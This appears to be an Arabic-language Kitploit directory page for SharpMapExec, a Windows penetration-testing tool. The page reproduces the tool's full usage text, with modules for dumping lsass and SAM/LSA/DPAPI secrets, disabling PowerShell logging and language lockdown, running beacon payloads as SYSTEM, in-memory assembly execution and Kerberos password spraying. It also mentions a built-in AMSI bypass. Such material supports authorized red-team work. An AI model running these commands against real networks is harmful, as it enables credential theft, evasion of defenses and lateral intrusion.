Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SharpMapExec — أداة اختبار اختراق شاملة خاصة بنظام ويندوز للحركة الجانبية، والوصول إلى بيانات الاعتماد، واستخراج البيانات، وفحص الثغرات عبر بروتوكولات CIM و SMB و WinRM و LDAP والمجال مع مصادقة Kerberos/NTLM. | Kitploit
أدوات/GitHubGitHub/cube0x0/sharpmapexec
أطر اختبار الاختراقتصعيد الامتيازاتالاستطلاعهجمات كلمات المرورالاستغلالالحركة الجانبيةتسريب البياناتجمع المعلوماتما بعد الاستغلالاختبار الاختراقالمصادقةالفريق الأحمر
671122منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubcube0x0/sharpmapexec

SharpMapExec

أداة اختبار اختراق شاملة خاصة بنظام ويندوز للحركة الجانبية، والوصول إلى بيانات الاعتماد، واستخراج البيانات، وفحص الثغرات عبر بروتوكولات CIM و SMB و WinRM و LDAP والمجال مع مصادقة Kerberos/NTLM.

عرض المستودع

SharpMapExec

نسخة محسنة من CrackMapExec. تم تصميم هذه الأداة لتبسيط اختبار الاختراق للشبكات وإنشاء أداة متعددة الاستخدامات تعمل على ويندوز، وهو مطلب شائع خلال محاكاة التهديدات الداخلية.

بالإضافة إلى مسح الوصول، يمكن استخدامها لتحديد التكوينات الضعيفة وتسريب البيانات. فكرة وحدات تسريب البيانات هي تنفيذ أقل قدر ممكن من الكود الضروري على الكمبيوتر البعيد. لتحقيق ذلك، ستقوم الأداة بتنزيل جميع الأسرار إلى دليل loot وتحليلها محليًا.

يمكنك تحديد ما إذا كنت تريد استخدام مصادقة Kerberos أو NTLM. إذا اخترت Kerberos، ستقوم الأداة بإنشاء رمز ضحي واستخدام Rubeus لاستيراد/طلب التذكرة. إذا تم تحديد NTLM، ستستخدم الأداة SharpKatz SetThreadToken أو انتحال هوية LogonUser.

root@kitploit:~
SharpMapExec.exe
  usage:

    --- Cim ---
        Need plaintext password or the /impersonate flag
        SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET

       Available Cim modules
          /m:enable_winrm                             (Runs Enable-PSRemoting -Force)
          /m:disable_winrm                            (Runs Disable-PSRemoting -Force)
          /m:disable_pslockdown                       (Modify __PSLockdownPolicy registry to disable CLM)
          /m:disable_pslogging                        (Modify registry to disable PowerShell Logging)
          /m:check_pslockdown                         (Check __PSLockdownPolicy registry)
          /m:check_pslogging                          (Check PowerShell Logging registry)

    --- Reg32 ---
        SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET
        SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

       Reg32 modules
          /m:disable_pslockdown                       (Modify __PSLockdownPolicy registry to disable CLM)
          /m:check_pslockdown                         (Check __PSLockdownPolicy registry)
          /m:check_pslogging                          (Check PowerShell Logging registry)

    --- Smb ---
        SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
        SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

       Smb modules
          /m:shares                                   (Scan for accessible Smb shares)

    --- WinRm ---
        SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
        SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH  /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

       WinRm modules
          /m:exec /a:whoami                           (Invoke-Command)
          /m:exec /a:C:\beacon.exe /system            (Invoke-Command as System)
          /m:comsvcs                                  (Dump & parse lsass)
          /m:secrets                                  (Dump and Parse Sam, Lsa, and System Dpapi blobs)
          /m:assembly /p:Rubeus.exe /a:dump           (Execute local C# assembly in memory)
          /m:assembly /p:beacon.exe /system           (Execute local C# assembly as System in memory)
          /m:assembly /p:getMailBox.exe /delegwalk    (Execute local C# assembly in all unique delegation processes in memory)
          /m:download /path:C:\file /destination:file (Download file from host)
          /m:upload   /path:C:\file /destination:file (Upload file to host)

    --- Domain ---
        SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
        SharpMapExec.exe tgtdeleg

    --- Ldap ---
        SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
        SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>

       Ldap modules
          /m:spraydata                                (Download user and password policy)

Smb

يمكن استخدامه لمسح الوصول الإداري، ومشاركات SMB القابلة للوصول، وإصدار SMB وتوقيع الترحيل.

root@kitploit:~
/m:shares                                  (Scan enumerated shares for access)

WinRm

الوحش. يحتوي على آلية تجاوز Amsi مدمجة، واختراق لغة JEA، وتحليل وظائف JEA. يمكن استخدامه لتنفيذ الأوامر، ومسح الوصول PsRemote، ونقاط JEA الضعيفة، وتسريب البيانات.

root@kitploit:~
/m:exec /a:whoami                           (Invoke-Command)
/m:exec /a:C:\beacon.exe /system            (Invoke-Command as System)
/m:comsvcs                                  (Dump Lsass Process)
/m:secrets                                  (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump           (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system           (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)

Domain

يدعم حالياً رش كلمات مرور المجال وإنشاء TGT للمستخدم الحالي يمكن استخدامها مع معامل /ticket للحصول على السياق الحالي.

Ldap

تنزيل البيانات اللازمة قبل رش كلمات المرور

root@kitploit:~
/m:spraydata                                (Download user and password policy)

مثال على الاستخدام

للتنفيذ السهل أو الجماعي في الذاكرة لتجميعات C#

رش كلمات مرور Kerberos ثم مسح الوصول الإداري المحلي

يدعم هذا المشروع مسح نقاط JEA وتحليل كود المصدر للأوامر غير الافتراضية والتحقق مما إذا كانت نقطة النهاية لم يتم تكوينها لوضع no-language.

اكتشاف إعادة استخدام كلمة مرور المسؤول المحلي باستخدام تجزئة NT.

تفريغ جماعي لعملية Lsass باستخدام DLL موقعة من مايكروسوفت مدمجة وحفظها في مجلد loot

ينفذ في جميع عمليات التفويض مرتبة حسب المستخدمين الفريدين

مسح توقيع SMB و SMBv1

والمزيد!

بعض السيناريوهات مع Kerberos تتطلب مزامنة ساعتك مع DC وتعيين DNS

root@kitploit:~
net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

شكر وتقدير

المشاريع التي ساعدت أو موجودة في هذه الأداة

  • Rubeus @Harmj0y
  • SharpDPAPI @Harmj0y
  • SharpKatz @b4rtik
  • Amsi.Fail @Flangvik
  • SharpSecDump @G0ldenGunSec
  • CrackMapExec @byt3bl33d3r
  • Pingcastle @mysmartlogon
  • SharpSpray
تنزيل الأداة